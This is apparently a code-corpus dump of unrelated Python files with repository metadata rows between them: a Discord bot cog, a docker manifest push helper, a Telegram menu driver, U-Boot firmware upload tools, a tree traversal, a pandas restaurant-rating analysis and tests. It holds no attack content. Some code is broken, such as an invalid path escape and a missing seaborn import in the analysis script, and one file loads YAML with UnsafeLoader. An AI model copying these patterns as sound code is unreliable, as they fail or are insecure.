found_entries.append((j, i))
if not found_entries: # No entries found...
await ctx.send(f"{ctx.author.name}, nothing contains `{input_text}`")
return
response = random.choice(found_entries) # pick a random valid entry.
await ctx.send((f"`{input_text}` (total {len(found_entries)}) - "
f"{response[0]+1}: `{response[1]}`"))
# example -> `pecan` (total 40) - 1813: `I might meet the other pecan.`
except FileNotFoundError:
await ctx.send(f"{ctx.author.name}, no pecan corpus file is included or it is "
f"configured incorrectly. Download it at "
f"<http://97.107.129.215/pecan.txt>")
@commands.command(name='fortune', aliases=['f'],
help="Unix fortune.")
async def fortune(self, ctx):
"Return a random unix fortune line."
fortune_msg = subprocess.check_output("fortune").decode("utf-8")
fortune_msg = fortune_msg[:1988] + "\u2026" if len(fortune_msg) > 1990 else fortune_msg
await ctx.send("```\n" + fortune_msg + "\n```")
    @shipname.error
    async def shipname_error(self, ctx, error):
        """Turn a missing-argument error on `shipname` into a friendly hint."""
        if isinstance(error, commands.MissingRequiredArgument):
            await ctx.send(f"{ctx.author.name}, please use two names as arguments")
    @shipcount.error
    @ship.error
    async def ship_error(self, ctx, error):
        """Relay converter failures from `ship`/`shipcount` back to the user."""
        if isinstance(error, commands.BadArgument):
            await ctx.send(f"{ctx.author.name}, {error.args[0]}")
def setup(bot):
    """Entry point used by discord.py's extension loader to register the cog."""
    bot.add_cog(FunCog(bot))
| 53.80303 | 100 | 0.544796 |
abb5b6a5115ed18e2c351f8835ee0c1d15acd865 | 3,151 | py | Python | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | 7 | 2019-07-16T19:10:57.000Z | 2019-07-29T07:50:39.000Z | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | null | null | null | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | null | null | null | import os
import re
import shutil
import attr
import click
import subprocess32 as subprocess
import yaml
from kross.utils import echo, get_std
@attr.s
class BasePush(object):
    """Shared state for kross push commands.

    Derives the registry target from the raw `docker push` arguments,
    locates the local docker manifest-list directory and prepares the
    `docker manifest push` command line.
    """
    push_args = attr.ib(type=tuple)  # raw CLI args forwarded to `docker push`
    registry_target = attr.ib()      # <repository/image:tag>, derived below
    manifest_directory = attr.ib()   # local dir holding the manifest list
    qemu_archs = attr.ib()           # arch descriptors loaded from archs.yaml
    push_manifest_cmd = attr.ib()    # command used to push the manifest list
    @registry_target.default
    def default_registry_target(self):
        # By convention the image reference is the last push argument.
        registry_target = self.push_args[-1]
        if re.match(r"(.*?)/(.*?):(.*)", registry_target):
            return registry_target
        # fmt: off
        raise click.ClickException("""Cannot find target image.
Please pass it in the <repository/image_name:image_tag> format.""")
        # fmt: on
    @manifest_directory.default
    def default_manifest_directory(self):
        # Generic registry handling
        manifest_directory = "{}/.docker/manifests/{}".format(
            os.path.expanduser("~"),
            self.registry_target.replace("/", "_").replace(":", "-"),
        )
        if os.path.exists(manifest_directory):
            return manifest_directory
        # Default non-explicit registry handling
        else:
            manifest_directory = "{}/.docker/manifests/docker.io_{}".format(
                os.path.expanduser("~"),
                self.registry_target.replace("/", "_").replace(":", "-"),
            )
            if os.path.exists(manifest_directory):
                return manifest_directory
        # NOTE(review): implicitly returns None when neither directory
        # exists -- confirm callers tolerate manifest_directory being None.
    @qemu_archs.default
    def default_qemu_archs(self): # pylint: disable=no-self-use
        # archs.yaml sits next to this module.
        arch_file = os.path.dirname(os.path.abspath(__file__)) + "/archs.yaml"
        with click.open_file(arch_file, "r") as stream:
            archs = yaml.load(stream=stream, Loader=yaml.UnsafeLoader)
        return archs.get("archs")
    @push_manifest_cmd.default
    def default_push_manifest_cmd(self):
        push_manifest_cmd = "docker manifest push {}".format(self.registry_target)
        return push_manifest_cmd
    def remove_manifest_directory(self):
        """Delete any stale local manifest list for this target."""
        echo("Purging manifest directory.", verbose_only=True)
        shutil.rmtree(path=self.manifest_directory, ignore_errors=True)
    def exec_push_manifest(self):
        """Run `docker manifest push`; abort the CLI on failure."""
        try:
            subprocess.run(
                self.push_manifest_cmd.split(),
                check=True,
                stdout=get_std(),
                stderr=get_std(),
            )
        except subprocess.CalledProcessError:
            raise click.ClickException("Cannot push manifest list to registry.")
    def __str__(self):
        # fmt: off
        # `locals()` supplies `self`, so the template can use {self.attr}.
        result = """
base_push:
  - registry_target: {self.registry_target}
  - manifest_directory: {self.manifest_directory}
  - push_manifest_cmd: {self.push_manifest_cmd}
  - push_args: """.format(**locals())
        for push_arg in self.push_args:
            result += "{} ".format(push_arg)
        result += """
  - qemu_archs: """
        for arch in self.qemu_archs:
            result += "{name} ".format(**arch)
        result += "\n"
        return result
        # fmt: on
| 33.521277 | 83 | 0.597271 |
abb63be3752095ce741f646a1eeb76e388b01a69 | 5,655 | py | Python | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | from comm.telegram import TelegramCommunicationBot
from telegram import Message
from util.misc import wlog, die, enumerate_2d_array
import traceback
class MessageResponse:
    """An incoming user message: the sender's `user_id` plus stripped `text`."""
    def __init__(self, text, user_id):
        self.text = str(text).strip()
        self.user_id = user_id
class MessageRequest:
    """Marker object yielded by menu generators to request the next user message."""
    pass
class MenuOption:
    """A selectable menu entry: visible `caption` plus an optional lookup `key`."""
    def __init__(self, caption, key=None):
        self.key = key
        self.caption = caption
class BotMenuBase:
    """Base class for generator-driven chat menus.

    Subclasses override `root_generator`; the generator yields
    MessageRequest objects whenever it needs user input, and the driver
    sends MessageResponse objects back in.  Outgoing text is buffered in
    `self.buffer` and joined into a single message by `flush`.
    """
    def root_generator(self):
        # Default: an empty generator (no dialog at all).
        yield from ()
    def __init__(self, bot: TelegramCommunicationBot):
        self.bot = bot
        self.user_id = None         # chat/user the menu is currently talking to
        self.next_message = None
        self.buffer = []            # outgoing lines awaiting flush()
        self.last_options = []      # keyboard options for the next send
        self.last_hide_kb = False
        self.last_is_kbd_compact = False
    def flush(self):
        """Join the buffered lines with blank lines and send as one message."""
        if self.buffer:
            full_message = '\n\n'.join(self.buffer)
            self.bot.send_message(user_id=self.user_id,
                                  message=full_message,
                                  hide_keyboard=self.last_hide_kb,
                                  options=self.last_options,
                                  resize_keyboard=self.last_is_kbd_compact)
            self.buffer = []
    def notify(self, text, hide_kb=False, options=list(), flush=False, compact_kbd=False):
        """Queue `text` for the user; flushes once 4 messages are buffered.

        NOTE(review): `options=list()` is a shared mutable default --
        harmless as long as nobody mutates it, but worth confirming.
        """
        if self.user_id and text:
            self.last_hide_kb = hide_kb
            self.last_options = options
            self.last_is_kbd_compact = compact_kbd
            self.buffer.append(text)
            if flush or len(self.buffer) >= 4:
                self.flush()
        else:
            wlog("Warning: can't notify; you need set user_id and send a valid text")
    def notify_error(self, text):
        """Show an error plus the standard hint on how to abort the dialog."""
        self.notify('{}\nType /quit or /q if you give up.'.format(text), flush=True)
    def set_next_message(self, msg: MessageRequest):
        self.next_message = msg
    def stop(self):
        # NOTE(review): raising StopIteration inside a generator is turned
        # into RuntimeError on Python 3.7+ (PEP 479).  The driver catches
        # StopIteration, so confirm behaviour on modern interpreters.
        raise StopIteration
    def gen_ask_until_validated(self, validator, text_on_fail='Try again.'):
        """Generator: keep asking until `validator(text)` returns non-None.

        '/quit' or '/q' aborts the dialog via `stop()`.
        """
        while True:
            r = yield MessageRequest()
            text = r.text
            if text in ['/quit', '/q']:
                self.notify('😤 Dialog stopped.')
                self.stop()
                return None
            value = validator(text)
            if value is None:
                if text_on_fail:
                    self.notify_error(text_on_fail)
            else:
                return value
    def gen_confirm(self, request_text: str, yes_option='Yes, I confirm', no_option='No, cancel please'):
        """Generator: yes/no confirmation dialog; returns True on 'yes'."""
        text = '🤝 Do you confirm this operation❓\n{}'.format(request_text)
        result = yield from self.gen_select_option(text, [
            MenuOption('✅ {}'.format(yes_option), 'yes'),
            MenuOption('🚫 {}'.format(no_option), 'no')
        ])
        return result == 'yes'
    def gen_select_option(self, request_text: str, options: list, compact_kbd=True) -> [str, int]:
        """Generator: show a numbered keyboard of MenuOptions and return the
        key of the selected one (answers accepted by number, caption,
        numbered caption or key)."""
        key_table = {}  # maps every accepted spelling of an option to its key
        n_options = 0
        def extract_string_for_keyboard(item, index):
            # Callback for enumerate_2d_array: registers the option under
            # all its accepted spellings and returns the display caption.
            if isinstance(item, MenuOption):
                text = item.caption
                key = item.key if item.key else index
            else:
                return 'error: each item must be a MenuOption instance'
            caption = '{}. {}'.format(index, text)
            key_table[str(index)] = key
            key_table[text] = key
            key_table[caption] = key
            key_table[key] = key
            nonlocal n_options
            n_options += 1
            return caption
        keyboard_numbered = enumerate_2d_array(options, 1, extract_string_for_keyboard)
        if n_options == 0:  # no options provided
            self.stop()
            return ''
        message_text = request_text
        while True:
            self.notify(message_text, options=keyboard_numbered, compact_kbd=compact_kbd)
            self.flush()
            answer = yield MessageRequest()
            answer_text = str(answer.text).strip()
            if answer_text in ['/quit', '0', 'q']:
                self.notify('😤 Dialog stopped.')
                self.stop()
                return ''
            else:
                if answer_text in key_table:
                    return key_table[answer_text]
                else:
                    message_text = '😡 Please select a valid option or send a number ' \
                                   'between 1 and {n}. Use /quit or 0 or q to exit. {orig_text}'.format(
                                       orig_text=request_text,
                                       n=n_options)
class BotMenuDriver:
    """Glue between the communication bot and a BotMenuBase menu: feeds
    incoming messages into the menu generator and restarts it when the
    dialog finishes."""
    def set_user_id(self, user_id):
        self.menu.user_id = user_id
    def on_message(self, msg: Message):
        """Bot callback: forward one incoming message to the menu generator."""
        try:
            user_id = self.bot.user_id_from_msg(msg)
            self.set_user_id(user_id)
            text = msg.text
            self.gen.send(MessageResponse(text, user_id))
        except StopIteration:
            # Dialog ended (menu called stop()): start a fresh session.
            wlog('Restarting menu generator.')
            self.start_generator()
        except Exception as e:
            wlog('Menu exception: {}'.format(e))
            traceback.print_exc()
    def start_generator(self):
        """(Re)create the menu generator and advance it to its first yield."""
        self.gen = self.menu.root_generator()
        try:
            next(self.gen)
        except:
            wlog("Error! Couldn't start the menu generator")
    def attach_to_bot(self, bot: TelegramCommunicationBot):
        """Register this driver as the bot's message handler and boot the menu."""
        self.bot = bot
        self.bot.message_handler = self.on_message
        self.set_user_id(bot.get_allowed_chat())
        self.start_generator()
    def __init__(self, menu: BotMenuBase):
        self.bot = None   # set by attach_to_bot
        self.menu = menu
        self.gen = None   # active generator, created by start_generator
abb674cdfb0957870cdb52790ce97f51c0c2b5eb | 10,358 | py | Python | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 8 | 2020-04-06T08:47:26.000Z | 2021-02-23T17:10:12.000Z | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 2 | 2020-05-14T16:59:33.000Z | 2021-06-19T23:48:35.000Z | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 2 | 2020-05-02T22:49:01.000Z | 2020-05-12T02:39:26.000Z | import logging
import ipaddress
import os
from . import utils
from . import ymodem
# -------------------------------------------------------------------------------------------------
class Action:
    """Base class for hiburn CLI sub-commands.

    Subclasses implement `run` and optionally `add_arguments`; `_run` is
    wired into argparse by `add_actions` as the dispatch callback.
    """
    @classmethod
    def _run(cls, client, config, args):
        # argparse entry point: instantiate the action and execute it.
        return cls(client, config).run(args)
    def __init__(self, client, config):
        self.client = client  # U-Boot client used to talk to the device
        self.config = config  # parsed tool configuration (incl. "net" section)
    @classmethod
    def add_arguments(cls, parser):
        pass
    def run(self, args):
        raise NotImplementedError()
    # some helper methods are below
    @property
    def host_ip(self):
        """Host IP taken from the configured `host_ip_mask` interface."""
        return ipaddress.ip_interface(self.config["net"]["host_ip_mask"]).ip
    @property
    def host_netmask(self):
        """Netmask taken from the configured `host_ip_mask` interface."""
        return ipaddress.ip_interface(self.config["net"]["host_ip_mask"]).netmask
    @property
    def device_ip(self):
        """Device IP from the configuration."""
        return ipaddress.ip_address(self.config["net"]["device_ip"])
    def configure_network(self):
        """ Common method to configure network on target device
        """
        self.client.setenv(
            ipaddr=self.device_ip,
            serverip=self.host_ip,
            netmask=self.host_netmask
        )
    def upload_files(self, *args):
        # Each arg is a (filename, address) pair, served over TFTP.
        utils.upload_files_via_tftp(self.client, args, listen_ip=str(self.host_ip))
    def upload_y_files(self, *args):
        # Same as upload_files but over the serial line (ymodem `loady`).
        for fname, addr in args:
            with open(fname, "rb") as f:
                data = f.read()
            self.client.loady(addr, data)
def add_actions(parser, *actions):
    """Register each Action class as a CLI sub-command on `parser`.

    The sub-command name is the class name, its help text is the class
    docstring, and `action._run` is stored as the dispatch callback.
    """
    subparsers = parser.add_subparsers(title="Action")
    for action_cls in actions:
        doc = action_cls.__doc__
        sub = subparsers.add_parser(
            action_cls.__name__,
            help=doc.strip() if doc else None,
        )
        action_cls.add_arguments(sub)
        sub.set_defaults(action=action_cls._run)
# -------------------------------------------------------------------------------------------------
class printenv(Action):
    """ Print U-Boot environment variables
    """
    def run(self, args):
        # One environment variable per line.
        env_lines = self.client.printenv()
        print("\n".join(env_lines))
# -------------------------------------------------------------------------------------------------
class ping(Action):
    """ Configure network on device and ping host
    """
    def run(self, args):
        self.configure_network()
        # U-Boot's ping reports success on its last output line.
        last_line = self.client.ping(self.host_ip)[-1]
        if last_line.endswith("is alive"):
            print("Network is fine")
        else:
            raise RuntimeError("network is unavailable")
# -------------------------------------------------------------------------------------------------
class download(Action):
    """ Download data from device's RAM via TFTP
    """
    @classmethod
    def add_arguments(cls, parser):
        parser.add_argument("--dst", type=str, default="./dump", help="Destination file")
        parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Address to start downloading from")
        parser.add_argument("--size", type=utils.hsize2int, required=True, help="Amount of bytes to be downloaded")
    def run(self, args):
        # Network must be configured before any TFTP transfer.
        self.configure_network()
        utils.download_files_via_tftp(self.client, (
            (args.dst, args.addr, args.size),
        ), listen_ip=str(self.host_ip))
# -------------------------------------------------------------------------------------------------
class upload(Action):
    """ Upload data to device's RAM via TFTP
    """
    @classmethod
    def add_arguments(cls, parser):
        parser.add_argument("--src", type=str, required=True, help="File to be uploaded")
        parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Destination address in device's memory")
    def run(self, args):
        # Network must be configured before any TFTP transfer.
        self.configure_network()
        self.upload_files((args.src, args.addr))
# -------------------------------------------------------------------------------------------------
class boot(Action):
""" Upload Kernel and RootFS images into device's RAM and boot it
"""
    @classmethod
    def add_arguments(cls, parser):
        """Declare CLI flags for the images, load addresses, transfer mode
        and the kernel `ip=` boot-argument pieces."""
        parser.add_argument("--uimage", type=str, required=True, help="Kernel UImage file")
        parser.add_argument("--rootfs", type=str, required=True, help="RootFS image file")
        parser.add_argument("--upload-addr", type=utils.hsize2int,
            help="Start address to upload into")
        parser.add_argument("--initrd-size", type=utils.hsize2int,
            help="Amount of RAM for initrd (actual size of RootFS image file by default)")
        parser.add_argument("--no-wait", action="store_true",
            help="Don't wait end of serial output and exit immediately after sending 'bootm' command")
        parser.add_argument("--ymodem", action="store_true",
            help="Upload via serial (ymodem protocol)")
        bootargs_group = parser.add_argument_group("bootargs", "Kernel's boot arguments")
        bootargs_group.add_argument("--bootargs-ip", metavar="IP", type=str,
            help="Literal value for `ip=` parameter")
        bootargs_group.add_argument("--bootargs-ip-gw", metavar="IP",type=str,
            help="Value for <gw-ip> of `ip=` parameter")
        bootargs_group.add_argument("--bootargs-ip-hostname", metavar="HOSTNAME", type=str,
            help="Value for <hostname> of `ip=` parameter")
        bootargs_group.add_argument("--bootargs-ip-dns1", metavar="IP", type=str,
            help="Value for <dns0-ip> of `ip=` parameter")
        bootargs_group.add_argument("--bootargs-ip-dns2", metavar="IP", type=str,
            help="Value for <dns1-ip> of `ip=` parameter")
def get_bootargs_ip(self, args):
if args.bootargs_ip is not None:
return args.bootargs_ip
fmt = "{client_ip}:{server_ip}:{gw_ip}:{netmask}:{hostname}:{device}:{autoconf}:{dns0_ip}:{dns1_ip}:{ntp0_ip}"
return fmt.format(
client_ip=self.device_ip,
server_ip=self.host_ip,
gw_ip=args.bootargs_ip_gw or self.host_ip,
netmask=self.host_netmask,
hostname=args.bootargs_ip_hostname or "camera1",
device="",
autoconf="off",
dns0_ip=args.bootargs_ip_dns1 or self.host_ip,
dns1_ip=args.bootargs_ip_dns2 or "",
ntp0_ip=""
)
def run(self, args):
uimage_size = os.path.getsize(args.uimage)
rootfs_size = os.path.getsize(args.rootfs) if args.initrd_size is None else args.initrd_size
alignment = self.config["mem"]["alignment"]
if args.upload_addr is None:
mem_end_addr = self.config["mem"]["start_addr"] + self.config["mem"]["linux_size"]
rootfs_addr = utils.align_address_down(alignment, mem_end_addr - rootfs_size)
uimage_addr = utils.align_address_down(alignment, rootfs_addr - uimage_size)
else:
uimage_addr = utils.align_address_up(alignment, args.upload_addr) # to ensure alignment
rootfs_addr = utils.align_address_up(alignment, uimage_addr + uimage_size)
logging.info("Kernel uImage upload addr {:#x}; RootFS image upload addr {:#x}".format(
uimage_addr, rootfs_addr
))
if args.ymodem:
self.upload_y_files((args.uimage, uimage_addr), (args.rootfs, rootfs_addr))
else:
self.configure_network()
self.upload_files((args.uimage, uimage_addr), (args.rootfs, rootfs_addr))
bootargs = ""
bootargs += "mem={} ".format(self.config["mem"]["linux_size"])
bootargs += "console={} ".format(self.config["linux_console"])
bootargs += "ip=" + self.get_bootargs_ip(args) + " "
bootargs += "mtdparts=hi_sfc:512k(boot) "
bootargs += "root=/dev/ram0 ro initrd={:#x},{}".format(rootfs_addr, rootfs_size)
logging.info("Load kernel with bootargs: {}".format(bootargs))
self.client.setenv(bootargs=bootargs)
resp = self.client.bootm(uimage_addr, wait=(not args.no_wait))
if resp is None:
print("'bootm' command has been sent. Hopefully booting is going on well...")
else:
print(
"Output ended with next lines:\n" +
"... {} lines above\n".format(len(resp)) +
"----------------------------------------\n" +
"\n".join(" {}".format(l.strip()) for l in resp[-10:]) +
"\n----------------------------------------"
)
# -------------------------------------------------------------------------------------------------
class download_sf(Action):
    """ Download data from device's SPI flash via TFTP

    Stages the requested flash region into device RAM with `sf read`,
    then pulls it to the host over TFTP.
    """
    @classmethod
    def add_arguments(cls, parser):
        parser.add_argument("--probe", type=str, required=True, help="'sf probe' arguments")
        parser.add_argument("--size", type=utils.hsize2int, required=True, help="Amount of bytes to be downloaded")
        parser.add_argument("--offset", type=utils.hsize2int, default=0, help="Flash offset")
        parser.add_argument("--dst", type=str, default="./dump.bin", help="Destination file")
        parser.add_argument("--addr", type=utils.hsize2int, help="Devices's RAM address read data from flash into")
    def run(self, args):
        """Probe the flash, read the region into RAM, then TFTP it out."""
        # Default staging buffer: 1 MiB past the start of device RAM.
        DEFAULT_MEM_ADDR = self.config["mem"]["start_addr"] + (1 << 20)  # 1Mb
        self.configure_network()
        self.client.sf_probe(args.probe)
        mem_addr = DEFAULT_MEM_ADDR if args.addr is None else args.addr
        logging.info("Read {} bytes from {} offset of SPI flash into memory at {}...".format(args.size, args.offset, mem_addr))
        self.client.sf_read(mem_addr, args.offset, args.size)
        utils.download_files_via_tftp(self.client, (
            (args.dst, mem_addr, args.size),
        ), listen_ip=str(self.host_ip))
# -------------------------------------------------------------------------------------------------
class upload_y(Action):
    """ Upload data to device's RAM via serial (ymodem)
    """
    @classmethod
    def add_arguments(cls, parser):
        # NOTE(review): the real arguments are stubbed out below, so this
        # action currently ignores the command line entirely.
        pass
        # parser.add_argument("--src", type=str, required=True, help="File to be uploaded")
        # parser.add_argument("--addr", type=utils.hsize2int, required=True, help="Destination address in device's memory")
    def run(self, args):
        # NOTE(review): sends a fixed placeholder payload -- this looks like
        # debug/scaffolding code rather than a finished action.
        self.client.loady(b"bla bla bla!")
| 41.266932 | 127 | 0.577621 |
abb837a9e83e5c81cca4c68f2584b6bea603d190 | 955 | py | Python | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | 1 | 2022-03-23T01:33:42.000Z | 2022-03-23T01:33:42.000Z | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | null | null | null | tree/inorder_traversal.py | vandesa003/leetcode_algo | 8ebefef685cd25d8e149592f24e3552c8903504a | [
"MIT"
] | 1 | 2020-07-24T03:32:30.000Z | 2020-07-24T03:32:30.000Z | """
中序遍历:DFS或者栈来实现。
leetcode No.94
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    """In-order traversal of a binary tree (LeetCode No. 94).

    Both variants return node values in left -> root -> right order.
    Annotations are quoted because ``TreeNode``/``List`` are only provided
    by the LeetCode harness; unquoted they raised ``NameError`` at import.
    """

    # DFS, recursive implementation.
    def inorderTraversal(self, root: "TreeNode") -> "List[int]":
        """Return the in-order sequence of values via recursion."""
        values = []

        def dfs(node):
            if not node:
                return
            dfs(node.left)
            values.append(node.val)
            dfs(node.right)

        dfs(root)
        return values

    # DFS with an explicit stack (non-recursive).
    # NOTE: declared without `self` in the original, so it only worked when
    # called through the class; @staticmethod keeps that call style working
    # and additionally makes instance calls behave correctly.
    @staticmethod
    def inorderTraversal_stack(root):
        """Return the in-order sequence of values using an explicit stack."""
        if not root:
            return root  # preserve original behavior: None in -> None out
        stack = []
        values = []
        while stack or root:
            if root is not None:
                # Walk down the left spine, stacking the ancestors.
                stack.append(root)
                root = root.left
            else:
                # Left subtree exhausted: visit the node, then go right.
                root = stack.pop()
                values.append(root.val)
                root = root.right
        return values
abba7040a0cfe0cf70bb295473073b731da5a2e6 | 412 | py | Python | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | places/permissions.py | easymean/ModusDRF | 155a33a058c6b86c4b12081f589da78761d83438 | [
"MIT"
] | null | null | null | from common.permissions import IsOwner
from rest_framework.permissions import IsAuthenticated
class IsHostAuthenticated(IsOwner):
    """Allow access only to authenticated hosts.

    BUG FIX: the original called ``IsAuthenticated(request, view)``, which
    instantiates the permission class with two unexpected constructor
    arguments (a ``TypeError`` at runtime) instead of evaluating it, and the
    success branch fell through returning ``None`` (i.e. access denied).
    The host check that was left commented out is restored below.
    """

    def has_permission(self, request, view):
        """Return True when the request user is an authenticated host."""
        # Evaluate the DRF permission properly instead of instantiating it
        # with bogus arguments.
        if not IsAuthenticated().has_permission(request, view):
            return False
        host = request.user
        # ``is_auth`` appears to be a project-specific verification flag on
        # the user model (see the commented-out intent in the original)
        # -- TODO confirm the attribute name.
        return bool(getattr(host, "is_auth", False))
| 25.75 | 54 | 0.604369 |
abbae38fd528e8e3b7d6157c4bab4dfdbdd77b68 | 602 | py | Python | PyObjCTest/test_nsnibloading.py | Khan/pyobjc-framework-Cocoa | f8b015ea2a72d8d78be6084fb12925c4785b8f1f | [
"MIT"
] | 132 | 2015-01-01T10:02:42.000Z | 2022-03-09T12:51:01.000Z | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsnibloading.py | mba811/music-player | 7998986b34cfda2244ef622adefb839331b81a81 | [
"BSD-2-Clause"
] | 6 | 2015-01-06T08:23:19.000Z | 2019-03-14T12:22:06.000Z | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsnibloading.py | mba811/music-player | 7998986b34cfda2244ef622adefb839331b81a81 | [
"BSD-2-Clause"
] | 27 | 2015-02-23T11:51:43.000Z | 2022-03-07T02:34:18.000Z | from AppKit import *
from PyObjCTools.TestSupport import *
class TestNSNibLoading (TestCase):
def testMethods(self):
self.assertResultIsBOOL(NSBundle.loadNibFile_externalNameTable_withZone_)
self.assertResultIsBOOL(NSBundle.loadNibNamed_owner_)
self.assertResultIsBOOL(NSBundle.loadNibFile_externalNameTable_withZone_)
@min_os_level('10.8')
def testMethods10_8(self):
self.assertResultIsBOOL(NSBundle.loadNibNamed_owner_topLevelObjects_)
self.assertArgIsOut(NSBundle.loadNibNamed_owner_topLevelObjects_, 2)
if __name__ == "__main__":
main()
| 31.684211 | 81 | 0.777409 |
abbb57cc94fe1363193069eeb5073e9570578f59 | 2,956 | py | Python | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | 2 | 2020-11-24T03:56:29.000Z | 2020-11-24T04:02:41.000Z | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | null | null | null | analysis.py | RaiderYi/data-analysis-wordcloud | c3eea7b9a3ac396981a1a19fa60fd1716ed05aa9 | [
"MIT"
] | null | null | null | #-*- coding:utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif']=['SimHei']# 用于显示plt的中文标签
pd.set_option('display.max_columns', None)#显示所有列
pd.set_option('display.max_rows', None)#显示所有行
data = pd.read_csv('C:\User\dell\Desktop\大众点评\dazhong.csv',encoding='gbk')
#print(data.head())#显示数据前5行
#print(data.head().columns)#显示数据每一列属性(即列名称)
#print(data.head().shape)#显示数据形状
data_analysis = data.loc[:,['Type', 'ID', 'ReviewNum', 'Level',
'FlavorScore', 'EnvironmentScore', 'ServiceScore',
'ApplauseRate', 'PictureNum', 'ParkingNum']]#选取特定的列
#菜系种类
kind=data_analysis['Type'].value_counts().sort_values(ascending=False)
kind=pd.DataFrame(kind)
#print(kind)
#菜系和评分之间的关系
kind_score=data_analysis[['Type','Level']].groupby(data_analysis['Type']).mean()
print(kind_score)
#plt.figure()
#plt.bar(data_analysis['Type'],data_analysis['Level'])
#plt.show()
#评分分布情况
star_map = data_analysis['Level'].value_counts(ascending=True)
#print(star_map)
sizes=[3,85,170,445,1128,1293]
plt.figure()
plt.pie(star_map,
autopct='%3.2f%%', # 数值保留固定小数位
labels=['2','5','3','4.5','4','3.5'])
plt.legend()
plt.title('店家评分分布情况')
#plt.show()
#各种评分折线图
df_pf=data_analysis.groupby('Type')['FlavorScore', 'EnvironmentScore', 'ServiceScore'].mean()
df_pf.head()
fig=plt.figure(figsize=(16,6))
ax1=fig.add_subplot(111)
ax1.plot(df_pf.index,df_pf['FlavorScore'],label='FlavorScore')
ax1.plot(df_pf.index,df_pf['EnvironmentScore'],label='EnvironmentScore')
ax1.plot(df_pf.index,df_pf['ServiceScore'],label='ServiceScore')
ax1.set_ylim(0,10)
plt.title('菜系与口味,环境,服务得分分布')
plt.legend(loc='best')
plt.grid()
#plt.show()
#分析粤菜
data_yuecai = data_analysis.loc[0:721]
plt.figure()
plt.subplot(221)
plt.scatter(data_yuecai['Level'],data_yuecai['FlavorScore'],alpha=0.5,edgecolors='red')
plt.title('店家得分与口味得分')
plt.subplot(222)
plt.scatter(data_yuecai['Level'],data_yuecai['EnvironmentScore'],edgecolors='yellow')
plt.title('店家得分与环境得分')
plt.subplot(223)
plt.scatter(data_yuecai['Level'],data_yuecai['ServiceScore'],edgecolors='blue')
plt.title('店家得分与环境得分')
plt.subplot(224)
plt.stackplot(data_yuecai['Level'], data_yuecai['FlavorScore'],
data_yuecai['EnvironmentScore'],data_yuecai['ServiceScore'],
colors=['m','c','r','k'])
plt.legend()
plt.title('得分折叠图')
plt.show()
plt.figure()
sns.pairplot(data_yuecai,hue="Level",palette="husl") #hue 选择分类列#
plt.title('粤菜店家得分概况')
plt.show()
sns.heatmap(data_yuecai.corr())
plt.show()
sns.jointplot(data_yuecai['Level'], data_yuecai['FlavorScore'], kind='hex')
sns.jointplot(data_yuecai['Level'], data_yuecai['FlavorScore'], kind='kde')
sns.scatterplot(x=data_yuecai['ReviewNum'],y=data_yuecai['ApplauseRate'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['FlavorScore'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['EnvironmentScore'])
plt.show()
sns.boxplot(x = data_yuecai['Level'],y = data_yuecai['ServiceScore'])
plt.show()
| 34.776471 | 93 | 0.72429 |
abbc16642f88ae7f1504bc4fde9ba1c81bcb930e | 19,773 | py | Python | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 60 | 2018-09-26T15:46:00.000Z | 2021-10-10T02:37:14.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | gigabackup/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 1,706 | 2018-09-26T16:11:22.000Z | 2021-08-20T13:37:59.000Z | packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py | griffinmilsap/gigantum-client | 70fe6b39b87b1c56351f2b4c551b6f1693813e4f | [
"MIT"
] | 11 | 2019-03-14T13:23:51.000Z | 2022-01-25T01:29:16.000Z | import pytest
import graphene
from gtmcore.inventory.inventory import InventoryManager
from gtmcore.fixtures import ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV
from gtmcore.environment import ComponentManager
from gtmcore.environment.bundledapp import BundledAppManager
import gtmcore
